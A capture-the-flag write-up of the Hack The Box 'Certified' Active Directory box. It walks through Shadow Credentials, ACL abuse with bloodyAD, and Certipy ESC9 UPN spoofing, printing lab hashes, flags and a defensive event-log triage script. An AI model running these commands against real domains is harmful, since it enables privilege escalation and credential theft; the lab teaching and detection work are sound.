Setup
mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified
IP Address: 10.10.11.41
echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts
10.10.11.41 certified.htb
As this is an Assumed Breach scenario box, we are given the following credentials to start with:
judith.mader:judith09
Enumeration
nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb
# nmap findings
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49690/tcp open unknown syn-ack ttl 127
49691/tcp open unknown syn-ack ttl 127
49720/tcp open unknown syn-ack ttl 127
49729/tcp open unknown syn-ack ttl 127
Now, using NetExec and the provided credentials, we enumerate LDAP (port 389) and SMB (port 445).
Shares:
Users:
Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron
Using LDAP enumeration, we find that the user management_svc is Kerberoastable:
Using Hashcat we try to crack this hash with .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt
but are unsuccessful.
Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All
we get a BloodHound zip file to enumerate further.
Using BloodHound we find that we can reach ca_operator via the path below:
Setting the Management group's owner to Judith
Using the bloodyAD tool we set the owner to judith:
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader
With the command below we give judith GenericAll rights on the Management group so that we can add judith to the group:
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
Now we add the judith user to Management so that we also get the group's GenericWrite rights on the management_svc user:
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader
GenericWrite on Management_SVC
To exploit this we use pywhisker to add Shadow Credentials to management_svc.
./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc
python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache
python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc
From the Shadow Credentials attack above we get the NT hash of the management_svc user:
management_svc:a091c1832bcdd4677c28b5a6a1295584
Using NetExec we verify that this is the correct hash.
We have WinRM access as management_svc.
User Flag
Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357
Privilege Escalation
GenericAll rights on CA_Operator
Using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1!
we change the password of the ca_operator account, since management_svc has GenericAll rights over it.
Certipy
Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled
we find that the 'CertifiedAuthentication' template is vulnerable to ESC9 (the template has no security extension).
Since we have GenericAll from management_svc over ca_operator, we spoof the UPN of ca_operator using
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication
we request the certificate, since this template has no security extension and the UPN field is therefore trusted for mapping.
Using the obtained certificate we authenticate and retrieve the NT hash of Administrator with certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
administrator:0d5b49608bbce1751f708748f67e2d34
Now we revert the UPN of ca_operator back to its original value.
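From the defender's side, each step of this chain leaves a directory change a domain controller can log. The following is an added example (not part of the writeup): a small Python triage over constructed Windows Security events that flags the owner/ACL rewrite on the Management group, the msDS-KeyCredentialLink write on management_svc, and the UPN spoof on ca_operator. Event IDs 5136 and 4738 are real; every field value in the sample is constructed to mirror the steps above, and the privileged-name list is an assumption.

```python
"""Triage of constructed Windows Security events for the AD changes seen in this chain."""

# Constructed sample events. Event IDs 5136 (directory service object modified)
# and 4738 (user account changed) are real; the field values below are made up
# to mirror the steps in the writeup and are not captured from the box.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=Management,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 4738, "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "Administrator"},
    {"EventID": 4738, "SubjectUserName": "Administrator",
     "TargetUserName": "harry.wilson", "UserPrincipalName": "harry.wilson@certified.htb"},
]

# Accounts whose UPN should never appear on another object (assumed list).
PRIVILEGED_NAMES = {"administrator"}


def triage(events):
    """Return (severity, rule, detail) tuples for events an analyst should review."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        attr = e.get("AttributeLDAPDisplayName", "")
        who = e.get("SubjectUserName", "?")
        if eid == 5136 and attr == "msDS-KeyCredentialLink":
            # Shadow Credentials: a key credential added to another account.
            findings.append(("high", "shadow-credentials",
                             f"{who} wrote msDS-KeyCredentialLink on {e['ObjectDN']}"))
        elif eid == 5136 and attr == "nTSecurityDescriptor":
            # Owner/DACL rewrite, as done here with bloodyAD on the Management group.
            findings.append(("medium", "acl-or-owner-change",
                             f"{who} modified the security descriptor of {e['ObjectDN']}"))
        elif eid == 4738:
            # UPN spoofing: UPN set to a privileged name on a different account.
            upn = e.get("UserPrincipalName", "")
            local = upn.split("@", 1)[0].lower()
            target = e.get("TargetUserName", "").lower()
            if local in PRIVILEGED_NAMES and local != target:
                findings.append(("high", "upn-spoof",
                                 f"{who} set the UPN of {e['TargetUserName']} to {upn}"))
    return findings


if __name__ == "__main__":
    for severity, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the objects carry a matching SACL, so confirm that first. On the template side, re-enabling the security extension on CertifiedAuthentication (and enforcing strong certificate binding on the DCs via the KDC StrongCertificateBindingEnforcement setting) removes the ESC9 condition the UPN spoof relies on.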
We verify the access using nxc and evil-winrm:
Root Flag
Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb